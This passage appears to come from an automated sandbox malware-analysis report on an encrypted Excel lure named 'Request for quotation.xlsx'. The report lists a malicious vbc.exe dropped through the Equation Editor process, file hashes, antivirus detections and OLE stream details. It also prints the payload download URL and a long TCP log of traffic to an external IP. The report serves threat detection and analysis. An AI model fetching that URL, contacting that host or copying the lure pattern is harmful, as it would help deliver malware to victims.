                              SHA-512:48E479701738109D705F620F40E1D264BD22DACB78DE6B8C64F693AE09ED1C02A61C93F751C4D1710ECC4539493D2A2308EC0B86147D8E49B799E7D7FD28073B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:low
                              IE Cache URL:http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G._.............................L... ...`....@.. ....................................@..................................L..K....`...}........................................................................... ............... ..H............text....,... ...................... ..`.rsrc....}...`...~...0..............@..@.reloc..............................@..B.................L......H........R..<@...........................................................0..?........(....8....8........E........8....*.(.... .....:....& ....8......0..M....... ........8........E....".......8....s"..... ....(....:....&8....*..o....8........0.......... ........8........E....e...E...%...d.......8`....{....(.... ....(....:....&8.....9:... ....(....:....& ....8.....{....:....8....8.... ....8....*..(.... ....(....:l...& ....8a.......0..5....... ........8........E.................
                              C:\Users\user\Desktop\~$Request for quotation.xlsx
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):330
                              Entropy (8bit):1.4377382811115937
                              Encrypted:false
                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              C:\Users\Public\vbc.exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):962560
                              Entropy (8bit):4.317508777163088
                              Encrypted:false
                              SSDEEP:12288:wG0EuC4WRkmWF4fX8Lp1H24SYYSY+hbsBIZG1Xc:e04W62RSPsyZF
                              MD5:221E46C09EB3440BEB5A2256211C3262
                              SHA1:0F056342E6DFFB5C4F3CDD1D7BD4AC5427175BE0
                              SHA-256:6CA1B2240B6D547ADA7051DC4D0C198517436943FFD7A4D1EEBC0BCA19AC038A
                              SHA-512:48E479701738109D705F620F40E1D264BD22DACB78DE6B8C64F693AE09ED1C02A61C93F751C4D1710ECC4539493D2A2308EC0B86147D8E49B799E7D7FD28073B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G._.............................L... ...`....@.. ....................................@..................................L..K....`...}........................................................................... ............... ..H............text....,... ...................... ..`.rsrc....}...`...~...0..............@..@.reloc..............................@..B.................L......H........R..<@...........................................................0..?........(....8....8........E........8....*.(.... .....:....& ....8......0..M....... ........8........E....".......8....s"..... ....(....:....&8....*..o....8........0.......... ........8........E....e...E...%...d.......8`....{....(.... ....(....:....&8.....9:... ....(....:....& ....8.....{....:....8....8.... ....8....*..(.... ....(....:l...& ....8a.......0..5....... ........8........E.................

                              Static File Info

                              General

                              File type:CDFV2 Encrypted
                              Entropy (8bit):7.99662784202308
                              TrID:
                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                              File name:Request for quotation.xlsx
                              File size:2205696
                              MD5:109bae1300099a20ad3df28d09095bf1
                              SHA1:dd2c886624df876a75389a5690cf55fd59a0b217
                              SHA256:1154f054c7344a07eed067053d6f3cfec18bc3aee5078e94c3a77bba3827bb06
                              SHA512:a78807b0bc51dd6afa480b2f5321b2bb76356e0c7d9cd421e4a70215ec1479f3d69edeefc8a84b207ba73ba4335afbc697c612d4f64635420ac43e6bdf0c0227
                              SSDEEP:49152:xNGiwgGDTltv9bFH9dsa6H26QjHmeu+YsS4QOwu7CUDKf9VqtBN:xwiwhVXyXxInty4bsNfLqtBN
                              File Content Preview:........................>..................."...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~......................................................

                              File Icon

                              Icon Hash:e4e2aa8aa4b4bcb4

                              Static OLE Info

                              General

                              Document Type:OLE
                              Number of OLE Files:1

                              OLE File "Request for quotation.xlsx"

                              Indicators

                              Has Summary Info:False
                              Application Name:unknown
                              Encrypted Document:True
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:False
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:
                              Flash Objects Count:
                              Contains VBA Macros:False

                              Streams

                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                              General
                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                              File Type:data
                              Stream Size:64
                              Entropy:2.73637206947
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                              General
                              Stream Path:\x6DataSpaces/DataSpaceMap
                              File Type:data
                              Stream Size:112
                              Entropy:2.7597816111
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                              General
                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                              File Type:data
                              Stream Size:200
                              Entropy:3.13335930328
                              Base64 Encoded:False
                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                              General
                              Stream Path:\x6DataSpaces/Version
                              File Type:data
                              Stream Size:76
                              Entropy:2.79079600998
                              Base64 Encoded:False
                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 2184664
                              General
                              Stream Path:EncryptedPackage
                              File Type:data
                              Stream Size:2184664
                              Entropy:7.99990143991
                              Base64 Encoded:True
                              Data ASCII:. U ! . . . . . x . M . . q . . . . . M . . . . . . R j ] X . e L . . . . . . W . n , . . o ] . @ . F ^ $ . . . . . . W . . . . . . . . p % * 9 . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . .
                              Data Raw:cf 55 21 00 00 00 00 00 78 c3 4d e3 ca 71 c1 ec f6 8a f4 4d d1 e7 aa 8e a9 e6 52 6a 5d 58 d0 65 4c 99 97 01 ac 9f fc 57 a2 6e 2c 97 d2 6f 5d 0d 40 1d 46 5e 24 fb e2 99 ad f7 d9 57 b3 be a5 8b 05 e2 cb f9 70 25 2a 39 c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12
                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                              General
                              Stream Path:EncryptionInfo
                              File Type:data
                              Stream Size:224
                              Entropy:4.5381164508
                              Base64 Encoded:False
                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . ] D b . B o . p . ` . . . : q ) ^ t . . . . O . . . . r . . 4 . . . . . 1 . E . . . . 7 + . W . . . . . . . . . . . . . % . L % . . . .
                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2020 11:27:50.286534071 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.506021976 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.506149054 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.506499052 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727421999 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727463961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727499008 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727509975 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727524996 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727533102 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727560997 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727600098 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.947706938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947762012 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947798967 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947834015 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947875977 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947932959 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947948933 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.947962046 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.947981119 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.948026896 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.948065042 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.948085070 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.948111057 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167541981 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167603016 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167650938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167692900 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167731047 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167779922 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167793989 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167810917 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167845964 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167886019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167927027 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167954922 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167990923 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168000937 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168039083 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168056965 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168091059 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168123007 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168160915 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168191910 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168224096 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168241978 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168287039 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168311119 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168344021 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168361902 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168401003 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168418884 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168453932 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.172945023 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387686968 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387763023 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387820005 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387849092 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387872934 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387880087 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387929916 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387973070 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387989044 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388026953 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388044119 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388087988 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388098955 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388128042 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388164997 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388206005 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388221979 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388259888 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388278961 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388304949 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388345957 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388390064 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388415098 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388461113 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388483047 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388526917 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388550043 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388592958 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388617992 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388659954 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388684988 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388725996 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388753891 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388798952 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388819933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388864040 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388887882 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388930082 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388955116 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388999939 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389024973 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389070988 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389091969 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389136076 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389159918 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389206886 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389226913 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389283895 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389306068 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389348984 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389373064 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389419079 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389472961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389520884 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389581919 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389628887 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389650106 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389693975 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389714956 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389756918 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389776945 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389820099 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389842033 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389883995 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.392699957 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609061003 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609095097 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609132051 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609148979 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609164953 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609180927 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609195948 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609210968 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609222889 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609234095 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609246969 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609271049 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609278917 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609296083 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609302044 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609311104 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609329939 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609345913 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609354019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609361887 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609376907 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609400988 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609407902 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609433889 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609455109 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609466076 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609488010 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609498978 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609522104 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609532118 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609549999 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609560966 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609572887 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609580040 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609595060 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609607935 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609617949 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609637022 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.609642029 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609653950 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.609671116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.610476971 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.611840963 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611865044 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611877918 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611892939 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611908913 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611923933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611943960 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.611962080 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611967087 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.611983061 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.611995935 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612005949 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612013102 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612027884 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612040997 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612051964 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612066031 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612072945 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612082958 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612095118 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612102032 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612117052 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612128973 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612147093 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612153053 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612169981 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612180948 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612195969 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612205029 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612221956 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612241030 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612246037 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612253904 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612272024 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612277031 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612292051 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612304926 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612313986 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612322092 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612339973 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612349033 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612364054 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.612374067 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.612389088 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.618599892 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.622433901 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.828855038 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.828888893 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.828912020 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.828928947 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.828946114 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.828963995 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.828988075 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829000950 CET4916780192.168.2.22103.141.138.87
